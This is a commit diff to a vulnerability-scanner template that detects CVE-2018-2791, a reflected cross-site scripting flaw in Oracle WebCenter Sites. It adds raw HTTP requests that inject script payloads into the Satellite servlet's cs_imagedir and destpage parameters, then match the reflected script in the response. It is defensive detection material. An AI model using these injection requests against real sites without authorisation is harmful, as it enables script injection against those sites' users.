improve wcs cve-2018-2791 vulnerability check

2021-11-06 00:48:10 +01:00 · 2021-11-06 00:48:10 +01:00 · 69fc4c04c2
parent bbbd7909ee
commit 69fc4c04c2
1 changed files with 20 additions and 11 deletions
--- a/cves/2018/CVE-2018-2791.yaml
+++ b/cves/2018/CVE-2018-2791.yaml
@ -1,11 +1,10 @@
 id: CVE-2018-2791

 info:
-  name: Oracle WebCenter Sites XSS
+  name: Oracle WebCenter Sites Multiple XSS
  author: madrobot
  severity: high
-  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
-  tags: cve,cve2018,oracle,xss
+  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 8.20
@ -15,20 +14,30 @@ info:
    - http://www.securitytracker.com/id/1040695
    - http://www.securityfocus.com/bid/103800
    - https://www.exploit-db.com/exploits/44752/
+    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
+  tags: cve,cve2018,oracle,xss,webcenter sites,wcs

 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
-
-    matchers-condition: and
+  - raw:
+      - |
+        GET /cs/Satellite?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq"><script>alert(24)</script> HTTP/1.1
+        Host: {{BaseURL}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+      - |
+        GET /cs/Satellite?destpage="<h1xxx<scriptalert(24)</script&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
+        Host: {{BaseURL}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
    matchers:
      - type: word
        words:
-          - "<h1xxx<scriptalert(1)</script"
+          - '<script>alert(24)</script>'
        part: body
-
      - type: word
        words:
          - "text/html"
-        part: header
+        part: header
+    stop-at-first-match: true